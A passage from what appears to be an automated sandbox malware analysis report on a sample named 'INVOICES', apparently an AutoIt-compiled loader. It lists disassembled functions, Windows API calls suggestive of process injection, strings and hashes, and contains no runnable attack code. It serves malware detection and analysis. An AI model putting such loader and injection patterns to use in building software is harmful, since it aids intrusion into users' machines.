                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CreateShow
                                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                                  • Opcode ID: 2e628192487c3c7d6f6ed3fcfc30e1711d6b5f9e2c13c302230a6e8c5b7c2a91
                                                                                                                                  • Instruction ID: 909e2f28a68e0054fcf7565d0fa8ca7cfba62df7b2a89e1879bf737220f7417e
                                                                                                                                  • Opcode Fuzzy Hash: 2e628192487c3c7d6f6ed3fcfc30e1711d6b5f9e2c13c302230a6e8c5b7c2a91
                                                                                                                                  • Instruction Fuzzy Hash: 98F030B05006907EEA305717AC0CF772F7DE7C7F60B018229FA00A2170C5691800CA78
                                                                                                                                  Function 009423B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1082 9423b0-9424cd call 940000 call 9422a0 CreateFileW 1089 9424d4-9424e4 1082->1089 1090 9424cf 1082->1090 1093 9424e6 1089->1093 1094 9424eb-942505 VirtualAlloc 1089->1094 1091 942584-942589 1090->1091 1093->1091 1095 942507 1094->1095 1096 942509-942520 ReadFile 1094->1096 1095->1091 1097 942524-94255e call 9422e0 call 9412a0 1096->1097 1098 942522 1096->1098 1103 942560-942575 call 942330 1097->1103 1104 94257a-942582 ExitProcess 1097->1104 1098->1091 1103->1104 1104->1091
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009422A0: Sleep.KERNELBASE(000001F4), ref: 009422B1
                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009424C3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFileSleep
                                                                                                                                  • String ID: F1W1P7FKY3UGOZ5HT
                                                                                                                                  • API String ID: 2694422964-3223746154
                                                                                                                                  • Opcode ID: 41c2f837232bdeaf9940e434202af63d471d7bcc6ea5630cfdc0816fad100f72
                                                                                                                                  • Instruction ID: fa3ee22df1454785301b3bce7deb51802dc3968d4b5fe8b1f801eec1f7f7a193
                                                                                                                                  • Opcode Fuzzy Hash: 41c2f837232bdeaf9940e434202af63d471d7bcc6ea5630cfdc0816fad100f72
                                                                                                                                  • Instruction Fuzzy Hash: 2D518F30D04249DBEF15DBA4C854BEEBB78AF59304F004199F608BB2C0D7B91B49CBA5
                                                                                                                                  Function 007369CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1165 7369ca-7369f1 call 734f3d 1168 7369f7-736a05 call 734f3d 1165->1168 1169 76e38a-76e39a call 799604 1165->1169 1168->1169 1176 736a0b-736a11 1168->1176 1172 76e39f-76e3a1 1169->1172 1174 76e3a3-76e3a6 call 734faa 1172->1174 1175 76e3c0-76e408 call 750f36 1172->1175 1180 76e3ab-76e3ba call 794339 1174->1180 1186 76e42d 1175->1186 1187 76e40a-76e414 1175->1187 1179 736a17-736a39 call 736bec 1176->1179 1176->1180 1180->1175 1188 76e42f-76e442 1186->1188 1189 76e428-76e429 1187->1189 1192 76e448 1188->1192 1193 76e5b9-76e5ca call 752ed5 call 734faa 1188->1193 1190 76e416-76e425 1189->1190 1191 76e42b 1189->1191 1190->1189 1191->1188 1194 76e44f-76e452 call 7375e0 1192->1194 1202 76e5cc-76e5dc call 737776 call 735efb 1193->1202 1199 76e457-76e479 call 735f12 call 797492 1194->1199 1209 76e48d-76e497 call 79747c 1199->1209 1210 76e47b-76e488 1199->1210 1216 76e5e1-76e611 call 78fad2 call 750fac call 752ed5 call 734faa 1202->1216 1218 76e4b1-76e4bb call 797466 1209->1218 1219 76e499-76e4ac 1209->1219 1212 76e580-76e590 call 73766f 1210->1212 1212->1199 1222 76e596-76e5a0 call 7374bd 1212->1222 1216->1202 1226 76e4cf-76e4d9 call 735f8a 1218->1226 1227 76e4bd-76e4ca 1218->1227 1219->1212 1229 76e5a5-76e5b3 1222->1229 1226->1212 1234 76e4df-76e4f7 call 78fa6e 1226->1234 1227->1212 1229->1193 1229->1194 1240 76e51a-76e51d 1234->1240 1241 76e4f9-76e518 call 737f41 call 735a64 1234->1241 1242 76e51f-76e53a call 737f41 call 736999 call 735a64 1240->1242 1243 76e54b-76e54e 1240->1243 1264 76e53b-76e549 call 735f12 1241->1264 1242->1264 1247 76e550-76e559 call 78f98f 1243->1247 1248 76e56e-76e571 call 797428 1243->1248 1247->1216 1256 76e55f-76e569 call 750fac 1247->1256 1253 76e576-76e57f call 750fac 1248->1253 1253->1212 1256->1199 1264->1253
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00734F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00734F6F
                                                                                                                                  • _free.LIBCMT ref: 0076E5BC
                                                                                                                                  • _free.LIBCMT ref: 0076E603
                                                                                                                                    • Part of subcall function 00736BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00736D0D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                  • API String ID: 2861923089-1757145024
                                                                                                                                  • Opcode ID: 3e9b68bca64e6c801a7a115459c04d451d2900741056f43fa7f687b150f43c71
                                                                                                                                  • Instruction ID: 7da8afae95ca3cb982f6125f74e1be5c3085294332714208f657ed91ef1fd55f
                                                                                                                                  • Opcode Fuzzy Hash: 3e9b68bca64e6c801a7a115459c04d451d2900741056f43fa7f687b150f43c71
                                                                                                                                  • Instruction Fuzzy Hash: 99918171910259EFDF14EFA4CC559EDBBB4FF08314F148429F816AB292EB38A915CB60
                                                                                                                                  Function 0073F8CF Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 007502E2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00750313
                                                                                                                                    • Part of subcall function 007502E2: MapVirtualKeyW.USER32(00000010,00000000), ref: 0075031B
                                                                                                                                    • Part of subcall function 007502E2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00750326
                                                                                                                                    • Part of subcall function 007502E2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00750331
                                                                                                                                    • Part of subcall function 007502E2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00750339
                                                                                                                                    • Part of subcall function 007502E2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00750341
                                                                                                                                    • Part of subcall function 00746259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 007462B4
                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0073FB2D
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0073FBAA
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00774921
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                                  • String ID: %|
                                                                                                                                  • API String ID: 3094916012-1433500012
                                                                                                                                  • Opcode ID: 311f6fd32c6879091744db81dfcc74430fa506b8e70b56a4e17ab5df6dafac3c
                                                                                                                                  • Instruction ID: f5e6cf1a2bc9a93a1c3c4080395a4f22d7cc89764f2da70600751accf1b77aca
                                                                                                                                  • Opcode Fuzzy Hash: 311f6fd32c6879091744db81dfcc74430fa506b8e70b56a4e17ab5df6dafac3c
                                                                                                                                  • Instruction Fuzzy Hash: 3881ABB0915A84CFC384EF29E8486797BE5BB48316751C13ED619CB262EB7C4484CF69
                                                                                                                                  Function 007335B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007335A1,SwapMouseButtons,00000004,?), ref: 007335D4
                                                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007335A1,SwapMouseButtons,00000004,?,?,?,?,00732754), ref: 007335F5
                                                                                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,007335A1,SwapMouseButtons,00000004,?,?,?,?,00732754), ref: 00733617
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                  • String ID: Control Panel\Mouse
                                                                                                                                  • API String ID: 3677997916-824357125
                                                                                                                                  • Opcode ID: 05e6251a586c14b09c5f235020eafd7f466abfb63131be83b5b47f3a795d92d3
                                                                                                                                  • Instruction ID: a3985f676528810f9861c7a59d4efa6509986989c0c33b9b7bb9745496ab2acf
                                                                                                                                  • Opcode Fuzzy Hash: 05e6251a586c14b09c5f235020eafd7f466abfb63131be83b5b47f3a795d92d3
                                                                                                                                  • Instruction Fuzzy Hash: 7C115771A10208FFEB209F64DC81EAEBBBCEF04740F008669F805D7221E2759F409BA4
                                                                                                                                  Function 009412A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 00941A5B
                                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00941AF1
                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00941B13
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2438371351-0
                                                                                                                                  • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                                                                                  • Instruction ID: d2f858cf29b3c833dafdfe61176e3bce7c72eb8136ede9e7680d4648724922aa
                                                                                                                                  • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                                                                                  • Instruction Fuzzy Hash: 89621B30A14258DBEB24CFA4C850BDEB376EF58300F1095A9E10DEB394E7799E81CB59
                                                                                                                                  Function 00799604 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00735045: _fseek.LIBCMT ref: 0073505D
                                                                                                                                    • Part of subcall function 007997DD: _wcscmp.LIBCMT ref: 007998CD
                                                                                                                                    • Part of subcall function 007997DD: _wcscmp.LIBCMT ref: 007998E0
                                                                                                                                  • _free.LIBCMT ref: 0079974B
                                                                                                                                  • _free.LIBCMT ref: 00799752
                                                                                                                                  • _free.LIBCMT ref: 007997BD
                                                                                                                                    • Part of subcall function 00752ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00759BA4), ref: 00752EE9
                                                                                                                                    • Part of subcall function 00752ED5: GetLastError.KERNEL32(00000000,?,00759BA4), ref: 00752EFB
                                                                                                                                  • _free.LIBCMT ref: 007997C5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1552873950-0
                                                                                                                                  • Opcode ID: e7380544773663296b0c3136f1e3976d6f6c9a32d6817a33089202c8b0d22308
                                                                                                                                  • Instruction ID: 497a63c2404e6a09bcbb8245be61924dbeb2b8a76a853e4fb021183bf04ed523
                                                                                                                                  • Opcode Fuzzy Hash: e7380544773663296b0c3136f1e3976d6f6c9a32d6817a33089202c8b0d22308
                                                                                                                                  • Instruction Fuzzy Hash: D7516FB1D04218EFEF249F64DC85A9EBBB9EF48310F14059EF609A7242DB755A80CF58
                                                                                                                                  Function 0075487A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2782032738-0
                                                                                                                                  • Opcode ID: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                                                                                                                                  • Instruction ID: 6a3f72830591fc9e47b004f2ceba156fdd9b03633e934825cae86716f915dcea
                                                                                                                                  • Opcode Fuzzy Hash: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                                                                                                                                  • Instruction Fuzzy Hash: F04108716047059BDB288F69C8869EF77A5AF4036AB14853DEC1587640DBF8FDC88B40
                                                                                                                                  Function 00734DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID: AU3!P/|$EA06
                                                                                                                                  • API String ID: 4104443479-648605970
                                                                                                                                  • Opcode ID: ad9b76ce40333da8f3f92cf0c2394333fb2a066f9ae5ad6fd14aa3dafc67253e
                                                                                                                                  • Instruction ID: 72496805cd8ba12de3ff39fad7c7787389cfe1ef6f76390d91bbfc005d14c1f5
                                                                                                                                  • Opcode Fuzzy Hash: ad9b76ce40333da8f3f92cf0c2394333fb2a066f9ae5ad6fd14aa3dafc67253e
                                                                                                                                  • Instruction Fuzzy Hash: B6416D61A441589BFF299B64C8557BE7FA6EB05300F6C4075EC829B283C62DAD4487E1
                                                                                                                                  Function 007373E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 0076ED92
                                                                                                                                  • 762ED0D0.COMDLG32(?), ref: 0076EDDC
                                                                                                                                    • Part of subcall function 007348AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007348A1,?,?,007337C0,?), ref: 007348CE
                                                                                                                                    • Part of subcall function 00750911: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00750930
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: NamePath$FullLong_memset
                                                                                                                                  • String ID: X
                                                                                                                                  • API String ID: 3051022977-3081909835
                                                                                                                                  • Opcode ID: 9882df3b8edd270406d31d984120c5448eecdf96933b5a75c212f512e469485e
                                                                                                                                  • Instruction ID: ac1bce869139c82e223e72cf1ee027c8d322da9f3c0d34303785e9733bf285b7
                                                                                                                                  • Opcode Fuzzy Hash: 9882df3b8edd270406d31d984120c5448eecdf96933b5a75c212f512e469485e
                                                                                                                                  • Instruction Fuzzy Hash: AD21A471A042889BDB559F94C849BEE7BF8AF48705F048019E909A7242DBFC5949CFA1
                                                                                                                                  Function 00750F36 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0075588C: __FF_MSGBANNER.LIBCMT ref: 007558A3
                                                                                                                                    • Part of subcall function 0075588C: __NMSG_WRITE.LIBCMT ref: 007558AA
                                                                                                                                    • Part of subcall function 0075588C: RtlAllocateHeap.NTDLL(010B0000,00000000,00000001), ref: 007558CF
                                                                                                                                  • std::exception::exception.LIBCMT ref: 00750F6C
                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00750F81
                                                                                                                                    • Part of subcall function 0075871B: RaiseException.KERNEL32(?,?,00000000,007E9E78,?,00000001,?,?,?,00750F86,00000000,007E9E78,00739FEC,00000001), ref: 00758770
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                  • String ID: bad allocation
                                                                                                                                  • API String ID: 3902256705-2104205924
                                                                                                                                  • Opcode ID: 671bb035c2016ac8b6ef59823a3821ae22cfd82aadcd4572142511a596f73d7d
                                                                                                                                  • Instruction ID: e098a297a3b3835a06440538844adecc620a0acf106a00d5ba37444e2687c828
                                                                                                                                  • Opcode Fuzzy Hash: 671bb035c2016ac8b6ef59823a3821ae22cfd82aadcd4572142511a596f73d7d
                                                                                                                                  • Instruction Fuzzy Hash: D7F0C83150421DA7DB20BA94EC19EDE7BACDF10352F100469FD09A61D3EFF99A59C2D1
                                                                                                                                  Function 0079998C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 007999A1
                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007999B8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                                  • String ID: aut
                                                                                                                                  • API String ID: 3285503233-3010740371
                                                                                                                                  • Opcode ID: f50c60c6aa8a8a612e8c57782b258d8bc74710a326cdbd59dfe4941489898573
                                                                                                                                  • Instruction ID: 4e7a648b4b2de8b954e38f5ce8d0a41c4b28eb3ad062fd29d6147d2aa7368a91
                                                                                                                                  • Opcode Fuzzy Hash: f50c60c6aa8a8a612e8c57782b258d8bc74710a326cdbd59dfe4941489898573
                                                                                                                                  • Instruction Fuzzy Hash: ACD05E7954030DABDB50ABA4DC0EFDA773CEB04B00F0043B1FF54D11A1EAB595988B95
                                                                                                                                  Function 007ACBF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
